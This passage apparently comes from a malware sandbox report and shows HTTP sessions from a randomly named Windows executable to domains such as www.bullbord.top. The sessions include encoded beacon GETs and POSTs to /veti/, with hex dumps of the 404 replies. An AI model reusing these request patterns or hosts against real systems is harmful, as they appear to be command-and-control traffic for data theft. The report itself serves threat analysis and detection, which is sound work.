                                                                                                                                                                                                                                                              Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:26.963135958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              16192.168.11.2049757104.21.50.20280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:28.713229895 CEST555OUTGET /p1v4/?FlS=3ldH5dkH-dBLf&9B6h=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488059044 CEST780INHTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u79sJM3wJ9w0w7Omr2agti1dmKE3RstDMuloNIbuNOuIbY4H6RMpqMiBN281Ovk%2FB9YgSYlkrOuTIUZRPIJC60xg7l%2BiPyGsOLN7Xe7Dysz1lecoCZvvPrGLEUF4i%2F4GtCU0nDZn3mJw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15a9bdcd7c69-EWR
                                                                                                                                                                                                                                                              Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:29.488219023 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              17192.168.11.2049758203.161.46.20580900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.796564102 CEST811OUTPOST /veti/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.bullbord.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.bullbord.top/veti/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 34 39 52 2b 61 42 42 78 39 7a 30 5a 45 5a 34 69 6e 58 6c 64 67 47 54 41 50 30 4a 2b 4c 73 65 44 46 43 46 42 2f 39 58 64 76 67 68 67 7a 6a 55 30 35 79 70 67 6a 6e 61 45 4a 55 43 2b 57 6b 78 4f 4e 65 76 4b 6c 77 7a 61 4e 54 70 4a 75 6a 74 57 75 64 78 63 68 76 6a 53 44 68 74 38 42 68 4b 4d 71 58 5a 6a 4e 38 62 36 6d 35 4b 61 69 55 39 7a 70 4b 6a 48 73 52 69 4e 56 74 78 48 4c 30 5a 4f 42 61 77 68 4a 6d 4a 58 70 58 4d 75 78 4b 53 73 71 67 71 76 59 70 37 6a 32 41 46 65 65 69 57 63 38 38 56 6e 6e 42 67 6e 57 75 6c 39 4a 2b 6b 4e 55 65 67 68 44 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=PRYlSxU0BJHV49R+aBBx9z0ZEZ4inXldgGTAP0J+LseDFCFB/9XdvghgzjU05ypgjnaEJUC+WkxONevKlwzaNTpJujtWudxchvjSDht8BhKMqXZjN8b6m5KaiU9zpKjHsRiNVtxHL0ZOBawhJmJXpXMuxKSsqgqvYp7j2AFeeiWc88VnnBgnWul9J+kNUeghDg==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967178106 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:34 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967196941 CEST1289INData Raw: 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: rGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" st
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967207909 CEST1289INData Raw: 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d 34 31 2e 32 33 31 39 35 33 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                              Data Ascii: 59565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path449
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.967220068 CEST1289INData Raw: 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                                                                                                                                                                                                                                                              Data Ascii: l-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968401909 CEST1289INData Raw: 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b
                                                                                                                                                                                                                                                              Data Ascii: 44 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968498945 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39
                                                                                                                                                                                                                                                              Data Ascii: id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968511105 CEST1289INData Raw: 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31
                                                                                                                                                                                                                                                              Data Ascii: ,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968535900 CEST1289INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e
                                                                                                                                                                                                                                                              Data Ascii: 1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968682051 CEST1289INData Raw: 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;s
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.968735933 CEST1289INData Raw: 35 36 31 32 20 38 2e 30 35 35 34 35 2c 2d 33 2e 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69
                                                                                                                                                                                                                                                              Data Ascii: 5612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" />
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:35.130352020 CEST1289INData Raw: 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37
                                                                                                                                                                                                                                                              Data Ascii: :miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.11.2049759203.161.46.20580900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.500271082 CEST831OUTPOST /veti/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.bullbord.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.bullbord.top/veti/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 36 44 45 6e 35 42 2b 38 58 64 6f 67 68 67 37 44 55 78 6d 43 70 52 6a 6e 47 36 4a 52 69 2b 57 6b 31 4f 4e 66 66 4b 69 48 6e 5a 63 54 70 4c 6a 44 74 59 67 39 78 63 68 76 6a 53 44 68 35 57 42 68 53 4d 71 6b 52 6a 4e 5a 33 35 6f 5a 4b 56 31 6b 39 7a 74 4b 6a 44 73 52 69 6a 56 73 38 53 4c 79 56 4f 42 61 67 68 4a 7a 6c 59 77 6e 4d 6b 37 71 54 45 36 56 65 6c 41 36 2b 4f 31 6e 6c 4d 63 51 2f 6d 39 71 45 39 36 7a 55 44 56 39 35 50 4e 4f 64 6c 57 63 68 36 65 73 44 41 36 47 4a 77 69 79 5a 45 63 45 41 42 70 77 2f 63 46 4f 63 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKe6DEn5B+8Xdoghg7DUxmCpRjnG6JRi+Wk1ONffKiHnZcTpLjDtYg9xchvjSDh5WBhSMqkRjNZ35oZKV1k9ztKjDsRijVs8SLyVOBaghJzlYwnMk7qTE6VelA6+O1nlMcQ/m9qE96zUDV95PNOdlWch6esDA6GJwiyZEcEABpw/cFOc=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669632912 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:37 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669781923 CEST1289INData Raw: 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: rGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" st
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669796944 CEST1289INData Raw: 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d 34 31 2e 32 33 31 39 35 33 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                              Data Ascii: 59565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path449
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669903994 CEST1289INData Raw: 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                                                                                                                                                                                                                                                              Data Ascii: l-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669918060 CEST1289INData Raw: 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b
                                                                                                                                                                                                                                                              Data Ascii: 44 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669929028 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39
                                                                                                                                                                                                                                                              Data Ascii: id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669939995 CEST1289INData Raw: 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31
                                                                                                                                                                                                                                                              Data Ascii: ,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.669950962 CEST1289INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e
                                                                                                                                                                                                                                                              Data Ascii: 1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670232058 CEST1289INData Raw: 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;s
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.670301914 CEST1289INData Raw: 35 36 31 32 20 38 2e 30 35 35 34 35 2c 2d 33 2e 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69
                                                                                                                                                                                                                                                              Data Ascii: 5612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" />
